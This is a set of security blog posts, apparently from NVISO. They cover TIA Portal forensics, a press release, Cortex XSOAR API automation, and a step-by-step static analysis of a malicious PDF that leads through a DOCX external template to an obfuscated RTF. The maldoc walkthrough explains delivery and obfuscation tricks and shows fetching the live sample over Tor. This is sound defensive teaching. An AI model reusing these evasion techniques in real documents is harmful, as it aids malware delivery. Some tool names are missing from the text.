Manually searching through .xml files and highlighting the important nodes is a cumbersome process. To help with extracting the interesting parts of a “Settings.xml” file, I took the liberty of creating a small Python tool. You can download the tool from my GitHub repository.

By invoking it with the command below, the discussed nodes are extracted:

python3 ./ -f PATH_TO_SETTINGS.XML

Figure 9: Sample output of

To close this second blog post, some general notes on the “Settings.xml” file. This file belongs to the user; no additional privileges are needed to change or delete it. If you delete the file and start the TIA Portal, it will automatically create a fresh “Settings.xml” file. So it seems pretty easy to manipulate or clean this file. Still, the user (or the adversary) first needs to be aware that this file exists and which information it stores! The file is written as part of the tasks performed when the TIA Portal is closed normally. If the TIA Portal crashes, or the process gets killed by other means, the file will not be updated.
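To illustrate what such an extraction can look like, here is a minimal Python sketch using only the standard library. Note that the exact element names and nesting below are an assumption made for illustration (modelled on the node names discussed in this post); verify them against a real “Settings.xml” before relying on this.

```python
# Minimal sketch: pull forensically interesting values out of a TIA Portal
# "Settings.xml". The XML layout below is an ASSUMPTION for illustration;
# check it against a real Settings.xml before using this in practice.
import xml.etree.ElementTree as ET

SAMPLE = """
<Settings>
  <SettingNode Name="General">
    <SettingNode Name="LastOpenedProject">
      <Value>C:\\Users\\nviso\\Documents\\Automation\\testproject_09\\testproject_09.ap15_1</Value>
    </SettingNode>
  </SettingNode>
  <SettingNode Name="ProjectSettings">
    <SettingNode Name="LastProjects">
      <String>C:\\Users\\nviso\\Documents\\Automation\\testproject_09\\testproject_09.ap15_1</String>
      <String>C:\\Users\\nviso\\Documents\\Automation\\older_project\\older_project.ap15_1</String>
    </SettingNode>
  </SettingNode>
</Settings>
"""

def find_setting_node(root, name):
    """Return the first SettingNode element whose Name attribute matches."""
    for node in root.iter("SettingNode"):
        if node.get("Name") == name:
            return node
    return None

root = ET.fromstring(SAMPLE)

last_opened = find_setting_node(root, "LastOpenedProject")
print("Last opened project:", last_opened[0].text)

last_projects = find_setting_node(root, "LastProjects")
for entry in last_projects:  # chronological order, most recent first
    print("Recent project:", entry.text)
```

The same pattern (walk all “SettingNode” elements and match on the Name attribute) also works for the “ConnectionService” and “LoadService” nodes discussed above.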

Conclusion & Outlook

In this second part we have shown that the “Settings.xml” file does store valuable information and should be considered when analysing machines running the TIA Portal. Further, we have introduced a free tool to extract this data and, as a small bonus, a KAPE target to collect the “Settings.xml” file.

In the third part of this series of blog posts, we will have a look at what data we can extract from projects created with the TIA Portal.

About the Author

Olaf Schwarz is a Senior Incident Response Consultant at NVISO. You can find Olaf on Twitter and LinkedIn.

You can follow NVISO Labs on Twitter to stay up to date on all our future research and publications.

NVISO achieves Palo Alto Networks Cortex eXtended Managed Detection and Response (XMDR) Specialization

31 March 2022 at 08:00

Brussels, March 23, 2022. Managed Security Services provider NVISO today announced it has become a Palo Alto Networks Cortex® XMDR Specialization partner. NVISO joins a select group of channel partners who have earned this distinction through operational capabilities, fulfillment of business requirements, and completion of technical, sales enablement and specialization examinations. The Cortex XMDR Specialization will enable NVISO to combine the power of the best-in-class Cortex XDR™ detection and response solution with its managed services offerings, helping customers worldwide streamline security operations center (SOC) operations and quickly mitigate cyberthreats.

 “We are excited to partner with Palo Alto Networks to provide our customers with next-generation security technology for our services,” said Carola Wondrak, Business Development Lead at NVISO. Erik Van Buggenhout, Partner at NVISO emphasizes this further: “NVISO’s priority has always been delivering world-class cyber security services to our clients that are not bound to particular technology products or vendors. This being said, we consider Palo Alto Cortex a best-in-class, leading, platform which we rely on at the core of our managed services. We are thus very excited to be recognized as an XMDR Specialization partner.”

“Organizations need effective detection and response across the network, endpoint, and cloud but managing today’s threats effectively is a massive undertaking,” said Karl Soderlund, senior vice president, Worldwide Channel Sales at Palo Alto Networks. “NVISO’s commitment to attain the Cortex XMDR Specialization will give their managed security services customers peace of mind that the services they are choosing will mitigate security gaps and relieve the day-to-day burden of security operations for customers with 24/7 coverage.”

NVISO has a successful history with Palo Alto Networks, specifically focusing on Cortex solutions.  Through everything NVISO does, automation plays a crucial role. As an XSOAR MSSP partner of Palo Alto Networks, NVISO builds on Cortex XSOAR for its own internal efficiency through automation and orchestration, yet also provides automation services to its customers as an MSSP. NVISO has flexible deployments models whereby it can provide either dedicated, co-managed (shared responsibility between NVISO and the end customer) or fully outsourced XSOAR deployment models.

To achieve Specialization status, Palo Alto Networks partner organizations must have Cortex XDR-certified SOC analysts/threat hunters on staff and available 24/7. Partners seeking this XMDR Specialization distinction must also complete both technical and sales enablement and specialization examinations. Cortex XMDR Specialization partners combine experienced analysts, mature operational processes and proven customer support with Palo Alto Networks market-leading security products, enabling them to provide customers comprehensive visibility, detection and response across network, endpoint and cloud assets, combined with best-in-class threat prevention and in-depth security expertise.

To learn more about NVISOs Managed Services, visit: Managed Detect & Respond | NVISO

NVISO is a European cyber security firm specialized in IT security consultancy and managed security services. Looking to further expand its footprint throughout Europe, NVISO currently has offices in Brussels, Frankfurt and Munich, with new office openings planned later this year.

NVISO’s expert workforce consists of over 160 cyber security professionals, spread over Belgium, Germany, France, Austria and Greece. With world-class expertise as a key differentiator, our experts have obtained most of the well-known certifications in the industry, author and teach SANS courses and regularly present their expertise at conferences.


Media Contact:

Carola Wondrak


[email protected]

Cortex XSOAR Tips & Tricks – Using The API In Automations

By: wstinkens
1 April 2022 at 08:00


When developing automations in Cortex XSOAR, you can use the Script Helper in the built-in Cortex XSOAR IDE to view all the scripts and commands available for automating tasks. When there is no script or command available for the specific task you want to automate, you can use the Cortex XSOAR API to automate most tasks available in the web interface.

In this blogpost we will show you how to discover the API endpoints in Cortex XSOAR for specific tasks and which options are available to use them in your own custom automations. As an example we will automate replacing evidences in the incident evidence board.

To enable you to use the Cortex XSOAR API in your own automations, we have created a nitro_execute_http_request function which is available on the NVISO GitHub:

Cortex XSOAR API Endpoints

Before you can use the Cortex XSOAR API in your automation, you will need to know which API endpoints are available. The Cortex XSOAR API documentation can be found in Settings > Integrations > API Keys:

Here you can see the following links:

  • View Cortex XSOAR API: Open the API documentation on the XSOAR server
  • Download Cortex XSOAR API Guide: Download a PDF with the API documentation
  • Download REST swagger file: Download a JSON file which can be imported into a Swagger editor

You can use these links to view all the documented API endpoints for Cortex XSOAR with their paths, parameters and responses, including example request bodies. Importing the Swagger JSON file into a Swagger Editor or Postman will allow you to interact with the API for testing without writing a single line of code.

Using The API In Automations

Once you have determined the Cortex XSOAR API endpoint to use, you have 2 options available for use in an automation.

The first option is using the internalHttpRequest method of the demisto class. This performs an internal HTTP request on the Cortex XSOAR server. It is the faster of the two options, but there is a permissions limitation when using it in playbooks: when a command is executed manually (such as via the War Room or when browsing a widget), the request runs with the permissions of the executing user; when run via a playbook, it runs as a read-only user with limited permissions, isolated to the current incident only.

The second option for using the API in automations is the Demisto REST API integration. This integration is part of the Demisto REST API content pack available in the Cortex XSOAR Marketplace.

After installing the content pack, you will need to create an API key in Settings > Integrations > API Keys:

Click on Get Your Key, give it a name and click Generate key:

Copy your key and store it in a secure location:

If you have a multi-tenant environment, you will need to synchronize this key to the different accounts.

Next you will need to configure the Demisto REST API integration:

Click Add instance, copy the API key, and click Test to verify that the integration is working correctly:

You will now be able to use the following commands in your automations:

  • demisto-api-delete: send HTTP DELETE request
  • demisto-api-download: Download files from XSOAR server
  • demisto-api-get: send HTTP GET requests
  • demisto-api-multipart: Send HTTP Multipart request to upload files to XSOAR server
  • demisto-api-post: send HTTP POST request
  • demisto-api-put: send HTTP PUT request
  • demisto-delete-incidents: Delete XSOAR incidents

To do HTTP requests when only read permissions are required, you should use the internalHttpRequest method of the demisto class, because it does not require an additional integration and has better performance. From the Demisto REST API integration, you will mostly be using the demisto-api-post command for doing HTTP POST requests in your automations when write permissions are required.


Similar to the demisto.executeCommand method, demisto.internalHttpRequest does not throw an error when the request fails. Therefore, we have created a nitro_execute_http_request wrapper function to add error handling, which you can use in your own custom automations.

import json

def nitro_execute_http_request(method: str, uri: str, body: dict = None) -> dict:
    """Send internal http requests to XSOAR server

    :type method: ``str``
    :param method: HTTP Method (GET / POST / PUT / DELETE)
    :type uri: ``str``
    :param uri: Request URI
    :type body: ``dict``
    :param body: Body of request

    :return: dict of response body
    :rtype: ``dict``
    """
    response = demisto.internalHttpRequest(method, uri, body)
    response_body = json.loads(response.get('body'))

    if response.get('statusCode') != 200:
        raise Exception(f"Func: nitro_execute_http_request; {response.get('status')}: {response_body.get('detail')}; "
                        f"error: {response_body.get('error')}")

    return response_body

When you use this function to call demisto.internalHttpRequest, it will return an error when the HTTP request fails:

try:
    uri = "/evidence/search"
    method = "POST"
    body = {"incidentID": '9999999'}

    return_results(nitro_execute_http_request(method=method, uri=uri, body=body))
except Exception as ex:
    return_error(f'Failed to execute nitro_execute_http_request. Error: {str(ex)}')

We have added this custom function to the CommonServerUserPython automation. This automation is created for user-defined code that is merged into each script and integration during execution. It will allow you to use nitro_execute_http_request in all your custom automations.

Incident Evidences Example

To provide you an example of how to use the API in an automation, we will show how to replace evidences in the incident Evidence Board in Cortex XSOAR. We will build on the example of the previous post in this series where we add evidences based on the tags of an entry in the war room:

results = nitro_execute_command(command='getEntries', args={'filter': {'tags': 'evidence'}})

entry_ids = [result.get('ID') for result in results]

for entry_id in entry_ids:
    nitro_execute_command(command='AddEvidence', args={'entryIDs': entry_id, 'desc': 'Example Evidence'})

If you search the script helper in the built-in IDE, you will see that there is already an AddEvidence automation:

When using this command in a playbook to add evidences to the incident Evidence Board, you will get duplicates when the playbook is run multiple times. This could lead to confusion for the SOC analyst and should be avoided. A replace argument is not available in the AddEvidence command, but we can implement this using the Cortex XSOAR API.

To implement the replace functionality, we will first need to search for an entry in the incident Evidence Board with the same description, delete it and then add it again. There are no built-in automations available that support this but it is supported by the Cortex XSOAR API.

If we search the API documentation, we can see the following API Endpoints:

  • /evidence/search
  • /evidence/delete

To search for evidences with the same description, we have created a function:

def nitro_get_incident_evidences(incident_id: str, query: str = None) -> list:
    """Get list of incident evidences

    :type incident_id: ``str``
    :param incident_id: XSOAR incident id
    :type query: ``str``
    :param query: query for evidences

    :return: list of evidences
    :rtype: ``list``
    """
    uri = "/evidence/search"
    body = {"incidentID": incident_id}
    if query:
        body.update({"filter": {"query": query}})

    results = nitro_execute_http_request(method='POST', uri=uri, body=body)

    return results.get('evidences', [])

This function uses the wrapper function of the faster internalHttpRequest method in the demisto class because it does not require write permissions.

To delete the evidences we have created a second function which uses the demisto-api-post command because write permissions are required:

def nitro_delete_incident_evidence(evidence_id: str):
    """Delete incident evidence

    :type evidence_id: ``str``
    :param evidence_id: XSOAR evidence id
    """
    uri = '/evidence/delete'
    body = {'evidenceID': evidence_id}

    nitro_execute_command(command='demisto-api-post', args={"uri": uri, "body": body})

We use the nitro_execute_command function we discussed in a previous post in this series to add error handling.

We use these two functions to first search for evidences with the same description, delete them, and then add the tagged War Room entries as evidence in the incident Evidence Board again.

description = 'Example Evidence'
incident_id = demisto.incident().get('id')

query = f"description:\"{description}\""
evidences = nitro_get_incident_evidences(incident_id=incident_id, query=query)

for evidence in evidences:
    nitro_delete_incident_evidence(evidence_id=evidence.get('id'))

results = nitro_execute_command(command='getEntries', args={'filter': {'tags': 'evidence'}})

entry_ids = [result.get('ID') for result in results]

for entry_id in entry_ids:
    nitro_execute_command(command='AddEvidence', args={'entryIDs': entry_id, 'desc': description})


About the author

Wouter is an expert in the SOAR engineering team in the NVISO SOC. As the lead engineer and development process lead, he is responsible for the design, development and deployment of automated analysis workflows created by the SOAR engineering team, enabling the NVISO SOC analysts to detect attackers in customer environments faster. With his experience in cloud and DevOps, he has enabled the SOAR engineering team to automate the development lifecycle and increase the operational stability of the SOAR platform.

You can reach out to Wouter via his LinkedIn page.

Want to learn more about SOAR? Sign up here and we will inform you about new content and invite you to our SOAR For Fun and Profit webcast.

Analyzing a “multilayer” Maldoc: A Beginner’s Guide

6 April 2022 at 08:21

In this blog post, we will not only analyze an interesting malicious document, but we will also demonstrate the steps required to get you up and running with the necessary analysis tools. There is also a howto video for this blog post.

I was asked to help with the analysis of a PDF document containing a DOCX file.

The PDF is REMMITANCE INVOICE.pdf, and can be found on VirusTotal, MalwareBazaar and Malshare (you don’t need a subscription to download from MalwareBazaar or Malshare, so everybody that wants to, can follow along).

The sample is interesting for analysis, because it involves 3 different types of malicious documents.
And this blog post will also be different from other maldoc analysis blog posts we have written, because we show how to do the analysis on a machine with a pristine OS and without any preinstalled analysis tools.

To follow along, you just need to be familiar with operating systems and their command-line interface.
We start with an Ubuntu 20.04 LTS virtual machine (make sure that it is up-to-date by issuing the “sudo apt update” and “sudo apt upgrade” commands). We create a folder for the analysis: /home/testuser1/Malware (we usually create a folder per sample, with the current date in the folder name, like this: 20220324_twitter_pdf). testuser1 is the account we use; you will have another account name.

Inside that folder, we copy the malicious sample. To clearly mark the sample as (potentially) malicious, we give it the extension .vir. This also prevents accidental launching/execution of the sample. If you want to know more about handling malware samples, take a look at this SANS ISC diary entry.

Figure 1: The analysis machine with the PDF sample

The original name of the PDF document is REMMITANCE INVOICE.pdf, and we renamed it to REMMITANCE INVOICE.pdf.vir.
To conduct the analysis, we need tools that I develop and maintain. These are free, open-source tools, designed for static analysis of malware. Most of them are written in Python (a free, open-source programming language).
These tools can be found here and on GitHub.

PDF Analysis

To analyze a malicious PDF document like this one, we do not open the PDF document with a PDF reader like Adobe Reader. Instead, we use dedicated tools to dissect the document and find malicious code. This is known as static analysis.
Opening the malicious PDF document with a reader and observing its behavior is known as dynamic analysis.

Both are popular analysis techniques, and they are often combined. In this blog post, we are performing static analysis.

To install the tools from GitHub on our machine, we issue the following “git clone” command:

Figure 2: The “git clone” command fails to execute

As can be seen, this command fails, because on our pristine machine, git is not yet installed. Ubuntu is helpful and suggest the command to execute to install git:

sudo apt install git

Figure 3: Installing git
Figure 4: Installing git

When the DidierStevensSuite repository has been cloned, we will find a folder DidierStevensSuite in our working folder:

Figure 5: Folder DidierStevensSuite is the result of the clone command

With this repository of tools, we have different maldoc analysis tools at our disposal, like PDF analysis tools. and are two PDF analysis tools found in Didier Stevens’ Suite. pdfid is a simple triage tool that looks for known keywords inside the PDF file that are regularly associated with malicious activity. is able to parse a PDF file and identify the basic building blocks of the PDF language, like objects.

To run on our Ubuntu machine, we can start the Python interpreter (python3) and give it the program as first parameter, followed by options and parameters specific to pdfid. The first parameter we provide for pdfid is the name of the PDF document to analyze. Like this:

Figure 6: pdfid’s analysis report

In the report provided as output by pdfid, we see a bunch of keywords (first column) and a counter (second column). This counter simply indicates the frequency of the keyword: how many times does it appear in the analyzed PDF document?
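In essence, this triage step can be mimicked in a few lines of Python. The sketch below is a deliberate simplification: the real also handles obfuscated names (e.g., hex-escaped characters in keywords), which plain byte counting does not.

```python
# Simplified illustration of pdfid-style triage: count how often suspicious
# PDF name keywords occur in the raw file bytes. The real handles
# obfuscated names as well; this sketch does not.
KEYWORDS = [b"/Page", b"/JS", b"/JavaScript", b"/OpenAction", b"/EmbeddedFile", b"/ObjStm"]

def count_keywords(data: bytes) -> dict:
    """Return a keyword -> occurrence count mapping for the given file bytes."""
    return {kw.decode(): data.count(kw) for kw in KEYWORDS}

# Stand-in for real PDF bytes, since we don't ship the sample here.
sample = b"%PDF-1.7 ... /OpenAction 8 0 R ... /EmbeddedFile ... /ObjStm ..."
for keyword, count in count_keywords(sample).items():
    print(f"{keyword:15} {count}")
```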

As you can see, many counters are zero: keywords with zero counter do not appear in the analyzed PDF document. To make the report shorter, we can use option -n. This option excludes zero counters (n = no zeroes) from the report, like this:

Figure 7: pdfid’s condensed analysis report

The keywords that interest us the most, are the ones after the /Page keyword.
Keyword /EmbeddedFile means that the PDF contains an embedded file. This feature can be used for benign and malicious purposes. So we need to look into it.
Keyword /OpenAction means that the PDF reader should do something automatically, when the document is opened. Like launching a script.
Keyword /ObjStm means that there are stream objects inside the PDF document. Stream objects are special objects that contain other objects. These contained objects are compressed. pdfid is by nature a simple tool that is not able to recognize and handle compressed data. This has to be done with Whenever you see stream objects in pdfid’s report (e.g., /ObjStm with a counter greater than zero), you have to realize that pdfid is unable to give you a complete report, and that you need to use pdf-parser to get the full picture. This is what we do with the following command:

Figure 8: pdf-parser’s statistical report

Option -a is used to have produce a report of all the different elements found inside the PDF document, together with keywords like those produces.
Option -O is used to instruct pdf-parser to decompress stream objects (/ObjStm) and include the contained objects in the statistical report. If this option is omitted, then pdf-parser’s report will be similar to pdfid’s report. To know more about this subject, we recommend this blog post.

In this report, we see again keywords like /EmbeddedFile. 1 is the counter (e.g., there is one embedded file) and 28 is the index of the PDF object for this embedded file.
New keywords that did appear, are /JS and /JavaScript. They indicate the presence of scripts (code) in the PDF document. The objects that represent these scripts, are found (compressed) inside the stream objects (/ObjStm). That is why they did not appear in pdfid’s report, and why they do in pdf-parser’s report (when option -O is used).
JavaScript inside a PDF document is restricted in its interactions with operating system resources: it cannot access the file system, the registry, etc.
Nevertheless, the included JavaScript can be malicious code (a legitimate reason for the inclusion of JavaScript in a PDF document, is input validation for PDF forms).
But we will first take a look at the embedded file. We do this by searching for the /EmbeddedFile keyword, like this:

Figure 9: Searching for embedded files

Notice that the search option -s is not case sensitive, and that you do not need to include the leading slash (/).
pdf-parser found one object that represents an embedded file: the object with index 28.
Notice the keywords /Filter /FlateDecode: this means that the embedded file is not included in the PDF document as-is, but that it has been “filtered” first (e.g., transformed). /FlateDecode indicates which transformation was applied: “deflation”, e.g., zlib compression.
To obtain the embedded file in its original form, we need to decompress the contained data (stream), by applying the necessary filters. This is done with option -f:

Figure 10: Decompressing the embedded file

The long string of data (it looks random) produced by pdf-parser when option -f is used, is the decompressed stream data in Python’s byte string representation. Notice that this data starts with PK: this is a strong indication that the embedded file is a ZIP container.
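Conceptually, this step can be reproduced with Python’s zlib module: inflate the raw /FlateDecode stream bytes, then inspect the magic bytes of the result. The sketch below deflates a stand-in stream itself, since the real sample is not included here.

```python
# What option -f of does for /FlateDecode streams, in essence:
# inflate the raw stream bytes with zlib, then look at the first bytes of
# the result to guess the embedded file type.
import zlib

# Stand-in for a compressed PDF stream: we deflate a fake ZIP header
# ourselves, since we don't ship the real sample here.
raw_stream = zlib.compress(b"PK\x03\x04" + b"\x00" * 26 + b"fake zip content")

decompressed = zlib.decompress(raw_stream)
if decompressed.startswith(b"PK"):
    print("Embedded file looks like a ZIP container (could be an OOXML document)")
```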
We will now use option -d to dump (write) the contained file to disk. Since it is (potentially) malicious, we use again extension .vir.

Figure 11: Extracting the embedded file to disk

File embedded.vir is the embedded file.

Office document analysis

Since I was told that the embedded file is an Office document, we use a tool I developed for Office documents:
But if you would not know what type the embedded file is, you would first want to determine this. We will actually have to do that later, with a downloaded file.

Now we run on the embedded file we extracted: embedded.vir

Figure 12: No ole file was found

The output of oledump here is a warning: no ole file was found.
A bit of background can help understand what is happening here. Microsoft Office document files come in 2 major formats: ole files and OOXML files.
Ole files (official name: Compound File Binary Format) are the “old” file format: the binary format that was default until Office 2007 was released. Documents using this internal format have extensions like .doc, .xls, .ppt, …
OOXML files (Office Open XML) are the “new” file format. It’s the default since Office 2007. Its internal format is a ZIP container containing mostly XML files. Other contained file types that can appear are pictures (.png, .jpeg, …) and ole (for VBA macros for example). OOXML files have extensions like .docx, .xlsx, .docm, .xlsm, …
OOXML is based on another format: OPC. is a tool to analyze ole files. Most malicious Office documents nowadays use VBA macros. VBA macros are always stored inside ole files, even with the “new” OOXML format. OOXML documents that contain macros (like .docm) have one ole file inside the ZIP container (often named vbaProject.bin) that contains the actual VBA macros.
Now, let’s get back to the analysis of our embedded file: oledump tells us that it found no ole file inside the ZIP container (OPC).
This tells us 1) that the file is a ZIP container, and more precisely, an OPC file (thus most likely an OOXML file) and 2) that it does not contain VBA macros.
If the Office document contains no VBA macros, we need to look at the files that are present inside the ZIP container. This can be done with a dedicated tool for the analysis of ZIP files:
We just need to pass the embedded file as parameter to zipdump, like this:

Figure 13: Looking inside the ZIP container

Every line of output produced by zipdump, represents a contained file.
The presence of folder “word” tells us that this is a Word file, thus extension .docx (because it does not contain VBA macros).
When an OOXML file is created/modified with Microsoft Office, the timestamp of the contained files will always be 1980-01-01.
In the result we see here, there are many files that have a different timestamp: this tells us that this .docx file has been altered with a ZIP tool (like WinZip, 7zip, …) after it was saved with Office.
This is often an indicator of malicious intent.
When presented with an Office document that has been altered, it is recommended to take a look at the contained files that were most recently changed, as these are the most likely to have been tampered with for malicious purposes.
In our extracted sample, that contained file is the file with timestamp 2022-03-23 (that’s just a day ago, time of writing): file document.xml.rels.
We can use zipdump.py to take a closer look at this file. We do not need to type its full name to select it; we can just use its index: 14 (this index is produced by zipdump, it is not metadata).
Using option -s, we can select a particular file for analysis, and with option -a, we can produce a hexadecimal/ascii dump of the file content. We start with this type of dump so that we can first inspect the data and assure ourselves that the file is indeed XML (it should be pure XML, but since it has been altered, we must be careful).

Figure 14: Hexadecimal/ascii dump of file document.xml.rels

This does indeed look like XML: thus we can use option -d to dump the file to the console (stdout):

Figure 15: Using option -d to dump the file content
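The two dumps above can be reproduced with the following sketch (zipdump.py from Didier Stevens' Suite, embedded.vir from earlier; index 14 is specific to this sample):

```shell
if command -v zipdump.py >/dev/null 2>&1 && [ -f embedded.vir ]; then
  zipdump.py -s 14 -a embedded.vir   # hex/ascii dump of document.xml.rels
  zipdump.py -s 14 -d embedded.vir   # raw dump of the same contained file
else
  echo "zipdump.py or embedded.vir not available - adjust paths to your setup"
fi
```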

There are many URLs in this output, and XML is readable to us humans, so we can search for suspicious URLs. But since this is XML without any newlines, it’s not easy to read. We might easily miss one URL.
Therefore, we will use a tool to help us extract the URLs: re-search.py is a tool that uses regular expressions to search through text files. And it comes with a small embedded library of regular expressions, for URLs, email addresses, …
If we want to use the embedded regular expression for URLs, we use option -n url.
Like this:

Figure 16: Extracting URLs

Notice that we use option -u to produce a list of unique URLs (remove duplicates from the output) and that we are piping 2 commands together. The output of command zipdump is provided as input to command re-search by using a pipe (|).
Many tools in Didier Stevens’ Suite accept input from stdin and produce output to stdout: this allows them to be piped together.
Most URLs in the output of re-search have schemas.openxmlformats.org as FQDN: these are normal URLs, to be expected in OOXML files. To help filter out URLs that are expected to be found in OOXML files, re-search has a dedicated option: -F with value officeurls.

Figure 17: Filtered URLs
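These pipelines (both the unfiltered and the filtered run) look like this as commands. A sketch assuming both tools from Didier Stevens' Suite are installed:

```shell
if command -v zipdump.py >/dev/null 2>&1 && command -v re-search.py >/dev/null 2>&1 \
   && [ -f embedded.vir ]; then
  zipdump.py -s 14 -d embedded.vir | re-search.py -u -n url                 # all unique URLs
  zipdump.py -s 14 -d embedded.vir | re-search.py -u -n url -F officeurls   # expected OOXML URLs filtered out
else
  echo "zipdump.py, re-search.py or embedded.vir not available"
fi
```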

One URL remains: this is suspicious, and we should try to download the file for that URL.

Before we do that, we want to introduce another tool that can be helpful with the analysis of XML files: xmldump parses XML files with Python’s built-in XML parser, and can represent the parsed output in different formats. One format is “pretty printing”: this makes the XML file more readable by adding newlines and indentations. Pretty printing is achieved by passing parameter pretty to the tool, like this:

Figure 18: Pretty print of file document.xml.rels
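The pretty-printing step as a command sketch (xmldump.py takes pretty as a positional parameter, as described above):

```shell
if command -v zipdump.py >/dev/null 2>&1 && command -v xmldump.py >/dev/null 2>&1 \
   && [ -f embedded.vir ]; then
  zipdump.py -s 14 -d embedded.vir | xmldump.py pretty   # readable XML with newlines and indentation
else
  echo "zipdump.py, xmldump.py or embedded.vir not available"
fi
```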

Notice that the <Relationship> element with the suspicious URL, is the only one with attribute TargetMode=”External”.
This is an indication that this is an external template that is loaded from the suspicious URL when the Office document is opened.
It is therefore important to retrieve this file.

Downloading a malicious file

We will download the file with curl. Curl is a very flexible tool to perform all kinds of web requests.
By default, curl is not installed in Ubuntu:

Figure 19: Curl is missing

But it can of course be installed:

Figure 20: Installing curl

And then we can use it to try to download the template. Often, we do not want to download that file using an IP address that can be linked to us or our organisation. We often use the Tor network to hide behind. We use option -x to direct curl to use a proxy, namely the Tor service running on our machine. And then we like to use option -D to save the headers to disk, and option -o to save the downloaded file to disk with a name of our choosing and extension .vir.
Notice that we also number the header and download files, as we know from experience, that often several attempts will be necessary to download the file, and that we want to keep the data of all attempts.

Figure 21: Downloading with curl over Tor fails

This fails: the connection is refused. That’s because port 9050 is not open: the Tor service is not installed. We need to install it first:

Figure 22: Installing Tor

Next, we try again to download over Tor:

Figure 23: The download still fails

The download still fails, but with another error. The CONNECT keyword tells us that curl is trying to use an HTTP proxy, while Tor provides a SOCKS5 proxy. I used the wrong option: instead of option -x, I should be using option --socks5 (-x is for HTTP proxies).

Figure 24: The download seems to succeed

But taking a closer look at the downloaded file, we see that it is empty:

Figure 25: The downloaded file is empty, and the headers indicate status 301

The content of the headers file indicates status 301: the file was permanently moved.
Curl will not automatically follow redirections. This has to be enabled with option -L, let’s try again:

Figure 26: Using option -L
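Putting the pieces together, the final form of the download command looks like this. The URL below is a placeholder, not the real one from the sample, and the --max-time limit is an addition for safety:

```shell
# --socks5 routes the request through the local Tor SOCKS proxy,
# -L follows redirects, -D saves the response headers, -o names the download.
url="https://example.com/template"   # placeholder URL
curl --socks5 127.0.0.1:9050 -L --max-time 30 \
     -D headers2.vir -o template2.vir "$url" \
  || echo "download failed (is the Tor service running on port 9050?)"
```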

And now we have indeed downloaded a file:

Figure 27: Download result

Notice that we are using index 2 for the downloaded files, as to not overwrite the first downloaded files.
Downloading over Tor will not always work: some servers will refuse to serve the file to Tor clients.
And downloading with curl can also fail because of the User Agent String. The User Agent String is a header that curl includes whenever it performs a request: this header indicates that the request was made by curl. Some servers are configured to only serve files to clients with a “proper” User Agent String, like the ones used by Office or common web browsers.
If you suspect that this is the case, you can use option -A to provide an appropriate User Agent String.
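As a sketch (the User Agent String and URL below are made-up examples, not values from the sample):

```shell
# Impersonate a browser with option -A when a server refuses curl's default UA.
ua="Mozilla/5.0 (Windows NT 10.0; Win64; x64)"   # example UA string
curl -A "$ua" --max-time 30 -o download.vir "https://example.com/file" \
  || echo "download failed (placeholder URL, or server unreachable)"
```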

As the downloaded file is a template, we expect it to be an Office document, and we use oledump.py to analyze it:

Figure 28: Analyzing the downloaded file with oledump fails

But this fails. Oledump does not recognize the file type: the file is not an ole file or an OOXML file.
We can use Linux command file to try to identify the file type based on its content:

Figure 29: Command file tells us this is pure text

If we are to believe this output, the file is a pure text file.
Let’s do a hexadecimal/ascii dump with command xxd. Since this will produce many pages of output, we pipe the output to the head command, to limit the output to the first 10 lines:

Figure 30: Hexadecimal/ascii dump of the downloaded file
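The same inspection can be reproduced on any file; here is a sketch with a made-up stand-in file (demo.vir below is not the real sample):

```shell
printf '{\\rt demo content}' > demo.vir   # stand-in file for illustration
xxd demo.vir | head -n 10                 # hex/ascii dump, first 10 lines only
```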

RTF document analysis

The file starts with {\rt : this is a deliberately malformed RTF file. Rich Text Format is a text-based file format for Word documents. The format does not support VBA macros. Most of the time, malicious RTF files perform malicious actions through exploits.
Proper RTF files should start with {\rtf1. The fact that this file starts with {\rt is a clear indication that the file has been tampered with (or generated with a maldoc generator): Word will not produce files like this. However, Word’s RTF parser is forgiving enough to accept them.
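A quick way to check this marker, sketched with made-up files (proper.rtf and malformed.rtf are created here purely for illustration):

```shell
printf '{\\rtf1\\ansi demo}' > proper.rtf    # well-formed RTF header
printf '{\\rt demo}'         > malformed.rtf # tampered header
head -c 6 proper.rtf; echo      # prints {\rtf1
head -c 6 malformed.rtf; echo   # prints {\rt d
```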

Didier Stevens’ Suite contains a tool to analyze RTF files: rtfdump.py.
By default, running rtfdump.py on an RTF file produces a lot of output:

Figure 31: Parsing the RTF file

The most important thing we learn from this output is that this is indeed an RTF file, since rtfdump was able to parse it.
As RTF files often contain exploits, they often use embedded objects. Filtering rtfdump’s output for embedded objects can be done with option -O:

Figure 32: There are no embedded objects

No embedded objects were found. Then we need to look at the hexadecimal data: since RTF is a text format, binary data is encoded with hexadecimal digits. Looking back at figure 31, we see that the second entry (number 2) contains 8349 hexadecimal digits (h=8349). That’s the first entry we will inspect further.
Notice that 8349 is an odd number, and that encoding a single byte requires 2 hexadecimal digits. This is an indication that the RTF file is obfuscated to thwart analysis.
Using option -s, we can select entry 2:

Figure 33: Selecting the second entry

If you are familiar with the internals of RTF files, you would notice that the long, uninterrupted sequences of curly braces are suspicious: it’s another sign of obfuscation.
Let’s try to decode the hexadecimal data inside entry 2, by using option -H:

Figure 34: Hexadecimal decoding

After some random-looking bytes and a series of NULL bytes, we see a lot of FF bytes. This is typical of ole files. Ole files start with a specific set of bytes, known as a magic header: D0 CF 11 E0 A1 B1 1A E1.
We cannot find this sequence in the data; however, we find a sequence that looks similar: 0D 0C F1 1E 0A 1B 11 AE 10 (starting at position 0x46).
This is almost the same as the magic header, but shifted by one hexadecimal digit. This means that the RTF file is obfuscated with a method that has not been foreseen in the deobfuscation routines of rtfdump. Remember that the number of hexadecimal digits is odd: this is the result. Should rtfdump be able to properly deobfuscate this RTF file, then the number would be even.
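We can illustrate that shift with plain shell string slicing (the hex string below is the sequence from the dump, written as one string):

```shell
# The ole magic header is d0cf11e0a1b11ae1; in the sample it appears one hex
# digit late. Dropping a single leading digit restores it:
garbled="0d0cf11e0a1b11ae10"
echo "${garbled:1}"   # prints d0cf11e0a1b11ae10: it now starts with the real magic header
```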
But that is not a problem: I’ve foreseen this, and there is an option in rtfdump to shift all hexadecimal strings by one digit. This is option -S:

Figure 35: Using option -S to manually deobfuscate the file

We have different output now. Starting at position 0x47, we now see the correct magic header: D0 CF 11 E0 A1 B1 1A E1
And scrolling down, we see the following:

Figure 36: ole file directory entries (UNICODE)

We see the UNICODE strings RootEntry and ole10nAtiVE.
Every ole file contains a RootEntry.
And ole10native is an entry for embedded data. It should be all lowercase: the mixing of uppercase and lowercase is another indicator of malicious intent.

As we have now managed to direct rtfdump to properly decode this embedded ole file, we can use option -i to help with the extraction:

Figure 37: Extraction of the ole file fails

